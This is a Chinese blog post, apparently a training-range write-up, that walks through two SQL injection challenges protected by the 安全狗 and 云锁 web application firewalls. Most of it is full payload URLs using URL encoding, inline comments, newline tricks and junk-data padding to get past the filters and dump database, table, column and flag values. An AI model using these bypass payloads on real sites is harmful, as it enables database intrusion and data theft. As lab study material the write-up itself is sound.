SQL注入绕过WAF两道题目

最新推荐文章于 2021-12-30 21:59:26 发布
最新推荐文章于 2021-12-30 21:59:26 发布
阅读量2.3k 收藏 10
点赞数 12
分类专栏: Web SQL注入 WAF绕过 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47598409/article/details/115497825
版权
Web 同时被 3 个专栏收录
7 篇文章 2 订阅
订阅专栏
SQL注入
1 篇文章 0 订阅
订阅专栏
WAF绕过
1 篇文章 0 订阅
订阅专栏

前言

WAF工作原理

在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解。

WAF绕过之SQL注入绕过安全狗

在这里插入图片描述
先随便输入一个双引号来显示报错闭合的语句

http://120.25.24.45:31832/?id=1"

在这里插入图片描述

http://120.25.24.45:31832/?id=1")--+

在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/%2561%256e%25641=2--+

这里解释一下%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/OrDEr%23%0aby/*asifnjanf*/3--+

这里来确定它的字段数为3列
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22) union%23%0a all select/*safaqwf*/1,database(%23%0a),group_concat(schema_name) /*asdnuqw*/from information_schema.schemata--+

这里有一个细节,就是id=后面的加上一个负号,就是不显示前面的结果
爆出所有数据库,我们要选择目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(table_name)%20/*asdnuqw*/from%20information_schema.tables where table_schema='dotaxueyuan'--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(column_name)%20/*asdnuqw*/from%20information_schema.columns where table_name='key'--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(`key`)%20/*asdnuqw*/from%20dotaxueyuan.key--+

爆出key值
在这里插入图片描述

SQL注入绕过云锁

在这里插入图片描述
先随便输入一个单引号来显示报错闭合的语句

http://120.25.24.45:30550/?id=1'

在这里插入图片描述

http://120.25.24.45:30550/?id=1'--+

在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0a%2561%256e%25641=2--+

这里解释一下111111111111111111111这么一大串数字1就是运用SQL注入之垃圾数据绕过的原理,%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的
%23%0a这个URL解码就是#号和换行,也可以说是一个绕过姿势

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0aOrder%23%0a/*qweqwd*/by/*dasasdsaddac*/3--+

判断字段数,这个题的字段数为3,它这题如果你输入正确的语句是不会回显的
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),3--+

爆出目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(table_name) from information_schema.tables where table_schema=%27dotaxueyuan%27--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(column_name) from information_schema.columns where table_name=%27key%27--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(`key`) from dotaxueyuan.key--+

爆出key值
在这里插入图片描述
靶场链接来自于东塔攻防世界靶场
https://labs.do-ta.com/index/course/index?one=15&two=17&three=51&level=-1&other=-1&title=

晚安這個未知的世界
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
专栏目录
WAF剖析】——sql注入之云锁bypass
Demo不是emo的博客
11-26 7706
前天我们实战了安全狗的WAF,今天先来看看比它难度更高的云锁WAF,你会绕吗?看我带你将它拿下
网络安全面试题-SQL注入问题总结
m0_60571990的博客
03-25 1583
网络安全面试题-SQL注入问题总结
东软集团的java笔试题-Awesome-WAF:真棒WAF
06-20
东软集团的java笔试题很棒的WAF 精选的 WAF 内容精选列表。 :fire: 前言:这原本是我自己的 WAF 合集。 我将它开源,希望它对渗透测试人员和研究人员有用。 “社区只是互相学习。” #SharingisCaring 您还可以通过啤酒 IRL 或buymeacoffee.com做出贡献 简明定义: Web 应用程序防火墙是位于 Web 应用程序和客户端端点之间的安全策略实施点。 此功能可以在软件或硬件中实现,在设备设备中运行,或在运行通用操作系统的典型服务器中实现。 它可以是独立设备或集成到其他网络组件中。 (来源 ) 随意地 。 内容: 介绍: WAF 的工作原理: 使用一组规则来区分正常请求和恶意请求。 有时他们使用学习模式通过学习用户行为来自动添加规则。 操作模式: 否定模型(基于黑名单) - 黑名单模型使用预设签名来阻止明显恶意的 Web 流量,以及旨在防止利用某些网站和 Web 应用程序漏洞进行攻击的签名。 黑名单模型 Web 应用程序防火墙是公共 Internet 上的网站和 Web 应用程序的绝佳选择,并且对主要类型的 DDoS 攻击非常有效。 例如。 阻止所有<sc
【干货】记一次WAF对抗赛详解&全方位绕过WAF
Enweitech Software Works
07-02 1万+
0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网站等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利
Bypass之D盾IIS防火墙SQL联合注入绕过(新版)
18年3月萌新白帽子
07-04 1万+
这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入WAF小结
05-08
本文将对几种常见的SQL注入绕过WAF的方法进行详细说明。 #### 二、SQL注入类型 1. **GET注入**:通常发生在URL查询参数中。 2. **POST注入**:发生在HTTP POST请求的数据体中。 3. **COOKIE注入**:利用Cookie中的...
SQL注入中的WAF绕过技术
最新发布
08-03
SQL 注入中的 WAF 绕过技术 在 SQL 注入攻击中, Web 应用防火墙(WAF)是一个非常重要的安全防护机制。然而,攻击者可以使用各种技术来绕过 WAF 检测,从而达到攻击目的。本文将详细介绍 SQL 注入中的 WAF 绕过...
WAF专题6--WAF规则与报表
debugeeker的专栏
06-01 2266
规则配置 首先,WAF规则的定义是什么? 从前面的内容可以看到,基本上,WAF处理http分为四个阶段:请求头部,请求内容,响应头部,响应内容。那么WAF规则就是,定义在某个阶段WAF对符合某种条件的http请求执行指定动作的条例。 根据这个,WAF规则必须要包含这些元素:过滤条件,阶段,动作 由于http消息在传输过程中会对数据进行某种编码,所以,WAF规则往往也需要定义解码...
SQL注入10之防御绕过
weixin_56218159的博客
06-01 409
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献 ...
本文从现代WAF的基本原理讲起,涵盖WAF指纹识别、多种WAF绕过技术(上)
systemino的博客
07-24 793
前言 WAF(Web应用防护系统)最近变得非常流行,针对从小型企业到大型企业的不同客户,WAF供应商也设计了许多有针对性的解决方案。 WAF之所以很受欢迎,是因为它是保护Web应用程序的复杂解决方案,涵盖了所有防护任务。这就是为什么Web应用程序开发人员可以在某些安全方面依赖WAF的原因。尽管如此,WAF还是存在某些漏洞,它并不完美。PHP大马 那么,WAF应该如何证明它在项目中的实现...
2018-11-14 简单的SQL注入(带waf
昨天今天下雨天的博客
11-14 198
题目:简单的sql注入 分值:10 URL:http://www.shiyanbar.com/ctf/1875 解题思路: 输入1,显示了正常ID,输入1',报错MYSQL,明显的SQL注入点。 直接尝试sqlmap,没有结果(或许应该尝试–tamper 参数,使用脚本过waf,或者抓个包试一下)。 输入1' and '1'='1 ,页面没有反应。手工输入1' and '1'='2,页面...
WAF机制及绕过方法总结:注入篇
zhangge3663的博客
05-18 2591
本篇文章主要介绍WAF的一些基本原理,总结常见的SQL注入Bypass WAF技巧。WAF是专门为保护基于Web应用程序而设计的,我们研究WAF绕过的目的一是帮助安服人员了解渗透测试中的测试技巧,而是能够对安全设备厂商提供一些安全建议,及时修复WAF存在的安全问题,以增强WAF的完备性和抗攻击性。三是希望网站开发者明白并不是部署了WAF就可以高枕无忧了,要明白漏洞产生的根本原因,最好能在代码层面上就将其修复。 一、WAF的定义 WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略
云锁 mysql权限控制_利用apache特性绕过云锁sql注入防护
weixin_39899776的博客
02-05 211
测试代码:$db_host = 'localhost';$db_user = 'root';$db_pass = 'root';$id = $_REQUEST['sql'];$link = mysql_connect($db_host, $db_user, $db_pass) or die("DB Connect Error:" . mysql_error());mysql_select_db('...
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
youngerll的博客
12-30 3380
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
11.WAF绕过原理
kinght的博客
08-27 839
title: 11.WAF绕过原理 date: 2020-08-24 20:09:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 现如今,应该是市面上所有的网站都会有着WAF的存在 Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款.
什么是WAF防护?
热门推荐
ying_yingying的博客
02-04 1万+
在又拍云的云安全类别中,WAF防护是其中之一的功能,WAF主要防护的是来自对网站源站的动态数据攻击,可防护的攻击类型包括SQL注入、XSS攻击、CSRF攻击、恶意爬虫、扫描器、远程文件包含等攻击。     SQL注入攻击(SQL Injection),          简称注入攻击,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件
浅谈自己关于SQL注入的认识
m0_48520508的博客
07-31 422
一、简介 本文作者是个努力进入渗透测试行业的小白,希望通过写文章来巩固自己所学习的知识,文章中可能有的地方会有误差,这个充满各种玄幻的计算机世界,有很多灵异错误,我暂时把自己认为对的写出来,如果您看到这篇文章,有什么错误可以直接指出,如果这篇文章可以给您带来一点小小的启发,那就更好了。​ 免责声明:这篇文章仅供小白之间的学习交流,请勿通过学习文章之后对真实网站进行测试 二、正文: 0x01 SQL注入原理 SQL注入概念及产生原因? 当web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参
揭秘SQL注入绕过WAF与过滤机制的策略
深入理解SQL注入绕过Web应用防火墙(WAF)和过滤机制是一门关键的技能,尤其是在IT安全领域。WAF是一种网络安全系统,旨在检测并阻止恶意攻击,尤其是针对Web应用程序的攻击,如SQL注入。本文将带你探讨以下几个关键...
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值